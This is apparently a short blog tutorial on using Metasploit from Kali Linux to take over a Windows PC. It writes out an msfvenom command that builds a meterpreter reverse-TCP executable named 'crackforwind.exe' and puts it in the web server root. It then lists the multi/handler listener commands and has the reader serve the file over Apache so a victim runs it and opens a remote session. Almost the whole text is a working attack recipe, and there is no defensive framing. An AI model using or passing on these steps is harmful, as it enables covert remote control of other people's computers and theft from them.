Using Metasploit on Windows
1) Know your Kali Linux IP
2) Generate a payload for windows using msfvenom using the command :-
msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /var/www/html/crackforwind.exe
3) Now we start configuring our metasploit and do the following commands
msfdb init
msfconsole
use/exploit/multi/handler
set payload/windows/x64/meterpreter/reverse_tcp
set lport 8080
set lhost = your ip
exploit
these commands initialize the database, start the msfconsole, start using mutli handler, and set the payload which we are using , and set lport and lhost and start the exploit
4) use apache2 command and start a server so that you can access the file on other device
5) Access the file on PC and execute it and it will start the meterpreter session and give you access
Comments
Post a Comment